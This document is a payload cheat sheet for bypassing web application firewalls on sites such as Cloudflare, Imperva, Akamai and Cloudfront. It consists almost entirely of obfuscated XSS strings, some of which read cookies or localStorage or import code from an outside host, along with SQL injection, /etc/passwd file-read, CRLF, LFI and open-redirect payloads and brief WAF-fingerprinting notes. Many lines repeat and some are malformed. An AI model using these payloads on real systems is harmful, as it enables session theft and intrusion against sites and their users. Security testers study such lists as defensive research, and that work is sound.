Bypassing Cloudflare WAF on Next.js 14.1.4!
-------------------------------------------
‘>alert(154)<​/script><​script/154=’;;;;;;;


WAF Bypass:
-----------
<acronym><p title="</#{endtag}><svg/onload​=alert(#{starttag})>">
<bgsound><p title="</#{endtag}><svg/onload​=alert(#{starttag})>">
<xmp><p title="</#{endtag}><svg/onload​=alert(#{starttag})>">
">'><details/open/ontoggle​=confirm('XSS')>
incapsula bypass: <iframe/onload​="var b ='document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;this['src']=a">


Cloudflare WAF Payload:
-----------------------
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
&lt;img longdesc="src='x'onerror​=alert(document.domain);//&gt;&lt;img " src='showme'&gt;
?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload​=alert("XSS") > 
utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> 
”/>&_lt;_script>alert(1)&_lt;/script>”/>
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover​=prompt&#40;1&#41;&#47;&#47;">XYZ</a>
<​script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/<​/script /***/
ellm1%3cscript%3ealert(1)%3c%2fscript%3ec2xwc
"><iNput///type="password"////id="CF-bypaSS" name="query"////value=""///oNfocUs​="alert('hello')" AutOfoCus="" />
&lt;img longdesc="src='x'onerror​=alert(document.domain);//&gt;&lt;img " src='showme'&gt;
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
<math><x xlink:href=javascript​:confirm`1`>click
<img%20src=x%20onerror=”%26%2397%26%23108%26%23101%26%23114%26%23116(1)”>
<button%20popovertarget=x>Click%20me</button><img%20onbeforetoggle=alert(1)%20popover%20id=x>XSS
<Svg%K9OnLoad=%7Krompt%6K1%6K>
<details open ontoggle​=content['al'%2B'ert'](1) >
<img+src%3dOnXSS+OnError%3dalert('XSs-Cloudflare-bypass-By-0xlipon')>
'<00 foo="<a%20href="javascript​:alert('XSS-Bypass')">XSS-CLick</00>--%20/
<div onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> 
"><body/oNpagEshoW​=(confirm)(document.domain)>
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS​=alert`1` //
"*alert("Hacked")*"
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<div style="width:100%;height:100vh;" onpointerover="[][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')](decodeURIComponent('%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29'))()"> </div>
'<00 foo="<a%20href="javascript​:alert('XSS-Bypass')">XSS-CLick</00>--%20/
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt​&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a> 
%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
javaScRipt:Alert(‘1’)
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
<svg onload=(function(){let arr=[41,49,40,116,114,101,108,97].reverse().map(e=>String.fromCharCode(e));let func=new Function(...arr);func();})()>
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u -xss popup
<svg onload=alert%26%230000000040"1")>
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1)"Onclick="([1].map(confirm))`
"><sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
%22%3E%3Csvg%20onload%3dalert%26%230000000040%22100%22)%3E
<a href="#" onclick="var w = window.open/**/(/**/); w.document.write/**/('Hello, world!'/**/); w.document.close/**/(/**/); w.print/**/(/**/); alert/**/('B1P4$$'/**/);">Click me</a>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>
<img+src%3dOnXSS+OnError%3dalert( 'XSs-Cloudflare-bypass-By-Debi ' )>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
"><input autofocus onfocus =top[(584390752*16).toString(32-1*2)](/XSS/)>
<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
"><img src=x onerrora=confirm() onerror=confirm(1)> 
"><svg onmouseover="confirm&#0000000040document.cookie)<!--
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t​:console.log(1337)">XSS</a>
<div style="width:100%;height:10Ovh;" onpointerover="[][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72)][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72)](decodeURIComponent('%61%6C%65%72%74%28%64%6F%6 3%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29'))0)"> </div>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
<a href="#" id="uniqueLink">Click me</a> <script> (function() { var a = ['\x6F\x70\x65\x6E', '\x77\x72\x69\x74\x65', '\x63\x6C\x6F\x73\x65', '\x70\x72\x69\x6E\x74', '\x61\x6C\x65\x72\x74']; var b = ['@', 'h', 'x', 'l', 'x', 'm', 'j']; var c = ['B', '1', 'P', '4', '$', '$']; document.getElementById('uniqueLink').onclick = function() { var w = window[a[0]](); w.document[a[1]](b.join('')); w.document[a[2]](); w[a[3]](); window[a[4]](c.join('')); }; })(); </script>
"/***/&gt;/***/<img onerror="alert(document.cookie)/***/" src="P"/>
"/**/>/**/<img src=P onerror=alert&#0000000040document.cookie)/**/>
"&gt;00%00%00<img onerror="alert(document.cookie)" src="P"/>00%00
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
<select><noembed></select><script x='a@b'a>y='a@b'//a@b%0a\u0061lert(1)</script x>
xss'''><iframe srcdoc='%26it;script>;prompt`${document.domain}`%26it;/script>'>
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
</ScRiPt><img src=something onauxclick="new Function al\ert\xss\``">
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
link=qwe"srcdoc="\u003ce<script%26Tab;src=//dom.xss>\u003ce</script%26Tab;e>
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle="+a+b+c+" popover id=x>Hvita</hvita>")
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E 
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
<svg/onload=window["al"+"ert"]1337>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert&#0000000040document.cookie)>
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
onxss=><svg/ONLoad​=alert(cookie)+x
ONxss=><details open ontoggle​=prompt(document.domain)+x
<svg/onload=window["al"+"ert"]1337>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert&#0000000040document.cookie)>
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
<svg onxss=() onload='setTimeout`alert\x281\x29`'>
<svg+onload%3Dalert%26%230000000040document.cookie%29>
<svg onload=prompt&#0000000040document.domain)> Hex: <svg onload=prompt&#x000000028;document.domain)>
'<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
<svg onx=() onload=(confirm) (document.cookie)>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
&lt;img longdesc="src='x'onerror=alert(document.domain);//&gt;&lt;img " src='showme'&gt;
"><img src=x onerrora=confirm() onerror=confirm(1)>
"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1Mg"))>
<a%2Fonmouseover%3D(confirm)(document.URL)>a
"><body/oNpagEshoW=(prompt)()>
"><body/oNpagEshoW=(prompt)(document.domain)>
"><input/onfocus=(confirm)(document.domain)>
"><body/oNpagEshoW=(confirm)(document.domain)>
"><body/onfocus=(confirm)(document.domain)>
"><Body/oNpagEshoW=(prompt)(1)>
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
&lt;img longdesc="src='x'onerror=alert(document.domain);//&gt;&lt;img " src='showme'&gt;
<svg onload=alert&#0000000040document.cookie)>
"*prompt(document.domain)*"
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
%3Cimg%2Fsrc%2Fonerror%3Dalert%2F%2F%26NewLine%3B%282%29%3E
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"-window[/*foo*/%27confirm%27/*bar*/](window[/*foo*/%27document%27/*bar*/][%27cookie%27])-"
"/hrefd=(1%0a%0aoncontentvisibilityautostatechange=confirm(/A00N/)%0d%0astyle=content-visibility:auto
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NLZCA6KQ=="))>


Imperva WAF Bypass:
-------------------
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<svg><set onbegin​=d=document,b='`',d['loca'+'tion']='javascript​&colon;aler'+'t'+b+domain+b>
%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter​=alert(location)%3E%3!–


Akamai WAF Bypass:
-------------------
<​style>@keyframes a{}b{animation:a;}<​/style><b/onanimationstart​=prompt`${document.domain}&#x60;>


This payload worked on Sucuri WAF:
----------------------------------
"><input/onauxclick​="[1].map(prompt)">


Advanced XSS Payloads:
----------------------
%22onmousemove=%22prompt(do\u0063ument.cookie)
[a](javascript​:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74​&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a'"`onerror=prompt(document.cookie)](x)
[notmalicious](javascript​:window.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
<​script>a="import\x28"<​/script> <​script>b="`//0-a\x2e"<​/script> <​script>c="nl`\x29"<​/script><​script>d=setTimeout<​/script><​script>e=eval<​/script><​script>f=`${a}${b}${c}`<​/script><​script>d`e\x28f\x29`<​/script>
1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt;>
<img/src/onerror​=arguments[0].path.pop().['al'+'ert'](1)>
JavaScript​://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/<​/Style/<​/Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus​= /*${/*/;{/**/(alert)(1)}//><Base/Href=//hello\76-->
d=document,b='`',d['loca'+'tion']='javascript​&colon;aler'+'t'+b+domain+b
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument[‘cookie’])
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt​&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a> 
<a/href=”j&#97v&#97script​&#x3A;&#97lert(document.cookie)”>ClickMe
<svg onload​=prompt&#0000000040document.domain)> Hex: <svg onload​=prompt&#x000000028;document.domain)>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>
<object data="data:text/html,<​script>alert(1)<​/script>">
<img src=a onerror​="vbscript:msgbox 1"/>
decodeURI(/alert(%22xss%22)/.source)
<object data="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;​&#x3A;alert(1)">
<img src=x onerror​="eval('\u0065val('\141\u006c&#101;&#x0072t\(&#49)')"/>
<A HRef=//site.com AutoFocus %26%2362 OnFocus%0C=import(href)>
<​style>@keyframes a{}b{animation:a;}<​/style><b/onanimationstart​=prompt`${document.domain}&#x60;>
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
%2sscript%2ualert()%2s/script%2u
xss'"><iframe srcdoc​='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
"><img src=x onerrora=confirm() onerror​=confirm(1)>
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>


SOME OF THE TOP XSS WAF BYPASS PAYLOADS :)
------------------------------------------
Akamai WAF:
-----------
'; k='e '%0Atop['al'+k+'rt'](1)//
*"><A HREF=\" AutoFocus OnFocus=top/**/?. ['ale '%2B'rt'](1)>

CloudFlare WAF:
---------------
<svg/onload=window["al"+"ert"]`1337'>
<Img src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm (document.domain)>
<svg onload=alert&#0000000040document.cookie)>
<sVG/ONLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/ONLY=1%20ONLOAD=confirm (document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import (Src)>
<Svg Only=1 OnLoad=confirm(atob ("Q2xvdWRmbGFyZSBCeXBhc3NLZCA6KQ=="))>

Cloudfront Waf:
---------------
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
*; window/*aabb*/ ['al '%2b'ert'] (document. /*aabb*/location); //
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>

Mod security:
-------------
<svg onload='new Function' ["Y000!"]. find (al\u0065rt)`'>

Imperva Waf:
------------
<Img Src=//X55.is OnLoad%0C=import(Src)>
<svg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9; //</div">
<details x=XXXXXXXXXXXXXXXXXXX
xxxxxxxx:2 open ontoggle=&#x0000000000061;
Lert&#x000000028; origin&#x000029;>



SQL Injection Bypass Akamai WAF Using HPP:
------------------------------------------
q=1%27Union+DistinctRow/*&q=*/Select+1



Local File Read/Disclosure - Akamai Bypass:
-------------------------------------------
file:///etc/x%252Fy/../passwd?/../passwd



Payloads for LFR/LFD:
---------------------
file:/etc/passwd%3F/ 
file:/etc%252Fpasswd/ 
file:/etc%252Fpasswd%3F/ 
file:///etc/%3F/../passwd 
file:${br}/et${u}c%252Fpas${te}swd%3F/ 
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
:/e?c/pas?w?
/e*c/p*w*d



OPENREDIRECT TO XSS BYPASS LIST :
--------------------------------
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
javascript://anything%0D%0A%0D%0Awindow.alert(document.cookie) javascript://www.whitelisteddomain.tld?%a0alert%281%29
javascript://%250Alert(document.location=document.cookie)
javascript://https://whitelisted.com/?z=%0Aalert(1)
j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0`
//j%5c%5cjavascript%3aalert(document.domain)
javascript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
%09Jav%09ascript:alert(document.domain)
javascript://sub.domain.com/%0Aalert(1)
javascript://%250Aalert(1)//?1\
javascript://%250A1?alert(1):0
java%0d%0ascript%0d%0a:alert(0)
java%0d%0ascript%0d%0a:alert(0)
java%07script:prompt`0`
java%09scrip%07t: prompt`0`
javascript:confirm(1)
javascript:prompt (1)
javascript://%250Aalert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)




// XSS WAF Bypass using location concatenation:

// Fingerprinting WAF (Cloudflare)
"><img src="x"> allowed
"><img src=x onerror> blocked
"><img src=x_onanything=""> not blocked // this shows blacklisting is being used.
"><body onload> = not blocked
"><body onload=> = blocked
"><body onbeforescriptexecute=x> not blocked // auto executes X
"><body onbeforescriptexecute=x()> = blocked
"><body onbeforescriptexecute=x(> = not blocked // Regex based protection used for blocking parenthesis "><body onbefore scriptexecute=x``> blocked // no chance of back tiks
"><body onbeforescriptexecute="location=javascript:"> blocked // javascript 
keyword not allowed "><body onbefore scriptexecute="b='a';location='jav'+b+' script: "> not blocked
"><BODY onbeforescriptexecute="c=')';b='a';location='jav'+b+'script:x('+c"> not blocked
// this sets location="javascript:x()" which bypasses keyword based and parenthesis filteration.

Keywords such as confirm, alert, prompt, document. were blocked. The same technique can be used to concatenate these keywords:
"><BODY onbeforescriptexecute="x1='cookie'; c=') '; b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'+x1+c">
Result: location="javascript:confirm(document.domain)"


<!-- You can hide your XSS payload inside SVG or Math element to bypass the XSS Sanitizer or WAF filter. -->
<svg>
  <style>
    <script>alert(1)</script>
  </style>
</svg>

<math>
  <style>
    <img src onerror=alert (2)>
  </style>
</math>



Top 20 Event Handlers to Trigger XSS:
-------------------------------------
onload=alert()
onerror=confirm()
onfocus=prompt()
onclick=alert()
onmouseover=confirm()
onchange=prompt() 
onmouseup-alert()
onkeydown=confirm() 
onkeyup-prompt()
onkeypress=alert() 
onMoveOn=confirm() 
onabort=prompt() 
ondblclick=alert() 
onresize=confirm() 
onselect=prompt() 
onscroll=alert() 
onsubmit=confirm() 
onblur-prompt() 
onreset-alert() 
onunload=confirm()


CRLF Injection Payloads:
------------------------
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection



Local File Inclusion:
---------------------
Accept: ../../../../.././../../../../etc/passwd{{ 
Accept: ../../../../.././../../../../etc/passwd{%0D 
Accept: ../../../../.././../../../../etc/passwd{%0A 
Accept: ../../../../.././../../../../etc/passwd{%00 
Accept: ../../../../.././../../../../etc/passwd{%0D{{ 
Accept: ../../../../.././../../../../etc/passwd{%0A{{ 
Accept: ../../../../.././../../../../etc/passwd{%00{{


XSS WAF Bypass payloads:
------------------------

CloudFlare WAF: <svg onload=alert&#0000000040document.cookie)>
<svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NLZCA6KQ=="))>


Cloudfront WAF: 
<details/open/ontoggle=confirm('XSS')>

6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
;window/*aabb*/['al'%2b'ert'](document./*aabb*/Location);
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//>

 Mod security:
<svg onload='new Function*["Y000!"].find(al\u0065rt)*'>

Imperva WAF: 
<details x=xxxXxXXXXXXXXXXXXXXXXXXXXXXXXKXXXXXXXXXXX 2 Open ontoggle=k&#x0000000000061;
alert&#x000000028;origin&#x000029;>


